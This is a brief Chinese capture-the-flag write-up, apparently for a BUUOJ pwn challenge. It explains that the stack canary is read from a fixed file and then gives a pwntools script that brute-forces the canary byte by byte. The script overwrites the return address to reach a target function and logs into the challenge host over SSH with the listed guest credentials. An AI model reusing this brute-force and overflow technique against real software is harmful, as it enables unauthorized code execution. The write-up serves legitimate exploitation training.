用IDA分析一下程序,程序从一个固定文件里读取数据,作为canary的值。
由于文件内容不变,所以,我们可以直接爆破。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
|
from pwn import *
shell = ssh(host='node3.buuoj.cn', user='CTFMan', port=27525, password='guest')
context.log_level = 'critical'
canary = ''
for i in range(4):
for c in range(0xFF):
sh = shell.process('./vuln')
sh.sendlineafter('>','-1')
payload = 'a'*0x20 + canary + p8(c)
sh.sendafter('Input>',payload)
sh.recv(1)
ans = sh.recv()
if 'Canary Value Corrupt!' not in ans:
print 'success guess the index({}),value({})'.format(i,c)
canary += p8(c)
break
else:
print 'try to guess the index({}) value'.format(i)
sh.close()
print 'canary=',canary
payload = 'a'*0x20 + canary + p32(0)*4 + p32(0x080486EB)
sh = shell.process('./vuln')
sh.sendlineafter('>','-1')
sh.sendafter('Input>',payload)
sh.interactive()
|